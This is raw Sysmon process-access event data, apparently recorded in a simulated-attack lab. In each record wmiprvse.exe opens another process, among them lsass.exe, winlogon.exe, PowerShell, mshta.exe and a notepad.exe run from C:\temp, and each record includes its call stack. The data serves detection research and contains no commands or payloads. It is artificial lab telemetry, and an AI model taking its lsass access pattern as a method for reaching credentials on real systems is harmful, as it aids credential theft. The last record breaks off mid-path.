16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031065Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031064Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031063Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031062Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.628{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031061Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55FA-6008-FF06-00000000A301}7712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031060Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031059Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031058Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031057Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031056Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031055Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031054Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031053Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031052Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031051Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031050Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031049Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.440{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031048Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031047Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031046Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program 